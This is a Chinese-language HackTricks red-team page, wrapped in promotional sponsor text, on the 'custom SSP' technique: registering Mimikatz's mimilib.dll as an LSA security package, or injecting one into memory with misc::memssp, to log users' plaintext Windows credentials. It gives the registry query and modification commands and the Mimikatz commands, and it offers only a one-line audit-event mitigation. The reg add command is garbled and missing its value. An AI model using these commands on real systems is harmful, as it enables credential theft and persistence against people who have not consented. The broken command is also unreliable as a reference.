# Custom SSP
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) 其他支持HackTricks的方式: * 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
### 自定义SSP [了解什么是SSP(安全支持提供者)请点击这里。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\ 您可以创建**自己的SSP**来**捕获**以**明文**形式访问计算机所使用的**凭据**。 #### Mimilib 您可以使用Mimikatz提供的`mimilib.dll`二进制文件。**这将在文件中记录所有明文凭据。**\ 将dll放入`C:\Windows\System32\`\ 获取现有LSA安全包的列表: {% code title="attacker@target" %} ``` ``` {% endcode %} \`\`\`bash PS C:\\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages" HKEY\_LOCAL\_MACHINE\system\currentcontrolset\control\lsa Security Packages REG\_MULTI\_SZ kerberos\0msv1\_0\0schannel\0wdigest\0tspkg\0pku2u ```` 将`mimilib.dll`添加到安全支持提供程序列表(安全包)中: ```powershell reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages" ```` #### 在内存中 您还可以直接使用 Mimikatz 将其注入到内存中(请注意,这可能会有点不稳定/无法正常工作): ```powershell privilege::debug misc::memssp ``` 这种方法在重启后无法生存。 #### 缓解 事件ID 4657 - 审计`HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`的创建/更改
从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) 支持HackTricks的其他方式: * 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! * 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) * 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) * **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。** * 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。